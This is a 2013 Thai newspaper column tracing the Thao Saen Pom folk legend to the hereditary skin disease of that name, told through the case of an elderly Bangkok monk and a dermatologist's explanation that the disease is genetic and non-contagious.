Download PDF

มติชนรายวัน ฉบับประจำวันพุธที่ 19 มิถุนายน 2556

 

          ท้าวแสนปม เป็นนิทานท้องถิ่นแถบลุ่มน้ำปิง เมืองกำแพงเพชร มาก่อนสมัยกรุงรัตนโกสินทร์

          ครั้นถึงต้นกรุงรัตนโกสินทร์ กรมสมเด็จพระปรมานุชิตฯ ทรงมีพระนิพนธ์พระราชพงศาวดารสังเขป แล้วจับเชื่อมต่อกับตำนานพระเจ้าพรหมจากโยนก กลายเป็นต้นเรื่องพระเจ้าอู่ทอง สร้างกรุงศรีอยุธยา

          ร.6 ทรงมีพระราชนิพนธ์ต่อเป็นบทละคร แล้วเชื่อถือกันมาถึงปัจจุบัน

          ท้าวแสนปม ปัจจุบันเป็นชื่อโรคผิวหนังชนิดหนึ่งที่เห็นแล้วน่ากลัว ซึ่งน่าจะเป็นชื่ออาการผิดปกติที่รับรู้กันมาแต่ดั้งเดิมว่าไม่มีพิษภัยต่อคนอื่น คนแต่ก่อนจึงผูกเป็นนิทานเรื่องนายแสนปม เป็นผู้มีบุญ ปลูกมะเขือยาวขายอย่างสุจริต สุดท้ายได้ครองเมืองเป็นท้าวแสนปม

อย่ารังเกียจ – หลวงพ่อสำอางค์ วัย 83 ปี พระลูกวัดวัดสุทธาราม กทม. ที่ป่วยเป็นโรคท้าวแสนปมมากว่า 40 ปี นำภาพถ่ายสมัยบวชใหม่ๆมาให้ดูเปรียบเทียบ เพื่อยืนยันมาป่วยในภายหลัง และไม่เคยท้อในการปฏิบัติกิจของสงฆ์ โดยวอนคนในสังคมอย่าตั้งแง่รังเกียจผู้ป่วยโรคนี้ (ที่มา หนังสือพิมพ์ไทยรัฐ ฉบับวันอาทิตย์ที่ 2 มิถุนายน 2556 หน้า 18)

          พระครูปลัดธรสำอางค์ สุจิตตฺโต อายุ 83 ปี (พระสงฆ์วัดสุทธาราม เขตคลองสาน กทม.) เป็นโรคท้าวแสนปม มีข่าวในไทยรัฐ (ฉบับวันอาทิตย์ที่ 2 มิถุนายน 2556) ว่าอุปสมบทเป็นพระเมื่อปี 2495 อายุ 23 ปี มีร่างกายเหมือนคนปกติ กระทั่งปี 2512 มีตุ่มขึ้นบริเวณใบหน้าและลำตัวเพียงเล็กน้อย

          ภายใน 1 ปี ตุ่มขยายเพิ่มมากขึ้นเรื่อยๆ จึงไปปรึกษาแพทย์ รพ. พระมงกุฎเกล้า ว่าเป็นโรคท้าวแสนปม ไม่มีทางรักษาหายขาด ทำได้เพียงทายาผิวหนัง และกินยาประคองอาการเท่านั้น เนื่องจากเป็นโรคผิวหนังที่ถ่ายทอดทางพันธุกรรมจากแม่ที่เป็นโรคท้าวแสนปมมาก่อน

          ภายใน 5 ปี เริ่มมีปุ่มขึ้นเป็นตะปุ่มตะป่ำขยายเต็มทั่วร่างกาย จนต้องทำใจยอมรับสภาพความเป็นจริงที่เป็นอยู่ เพื่อให้จิตใจสงบสุข ดำรงชีวิตต่อไปให้ได้

          นพ. จินดา โรจนเมธินทร์ (ผอ. สถาบันโรคผิวหนัง กรมการแพทย์ กระทรวงสาธารณสุข) อธิบายถึงโรคท้าวแสนปมว่าเกิดจากความผิดปกติถ่ายทอดทางพันธุกรรม แบ่งออก 2 กลุ่มใหญ่ คือ 1. เกิดตามผิวหนังตะปุ่มตะป่ำตามร่างกาย 2. นอกจากมีก้อนตะปุ่มตะป่ำ และระบบภายในร่างกายจะเกิดเส้นประสาทผิดปกติ กลุ่มนี้มีความรุนแรง มีผู้ป่วยเป็นน้อย ต้องรักษาโดยแพทย์ผู้เชี่ยวชาญเฉพาะด้าน

          กรณีพระครูปลัดธรสำอางค์ จัดอยู่ในกลุ่มมีก้อนตะปุ่มตะป่ำตามผิวหนังเท่านั้น ส่งผลให้ภาพลักษณ์ร่างกายแปลกประหลาด โรคท้าวแสนปมเป็นโรคไม่ติดต่อ แต่ถ่ายทอดกันทางพันธุกรรมจากพ่อแม่สู่ลูก และไม่สามารถป้องกันการถ่ายทอดทางพันธุกรรมได้

          ส่วนการรักษาเป็นเพียงรักษาปลายเหตุ คือการผ่าตัดก้อนใหญ่มีผลต่อการดำรงชีวิต และไม่สามารถผ่าตัดทั้งตัวได้ แต่สิ่งที่ห่วงคือเกรงว่าก้อนเนื้อเหล่านี้จะพัฒนากลายเป็นก้อนเนื้อมะเร็ง หากพบต้องผ่าตัดทันที

          พระพิศาลประชานาถ เจ้าอาวาสวัดสุทธาราม สำเหร่ กล่าวว่า พระสำอางค์ อุปสมบทก่อนเป็นโรคท้าวแสนปม และไม่ใช่โรคร้ายแรง หรือไม่เป็นโรคติดต่อ แต่เป็นเพียงโรคตามพันธุกรรม สามารถดำรงชีวิตตามปกติ และไม่สร้างความเดือดร้อนให้กับใคร ถือว่าไม่ผิดระเบียบทางสงฆ์d.getElementsByTagName(‘head’)[0].appendChild(s);} else {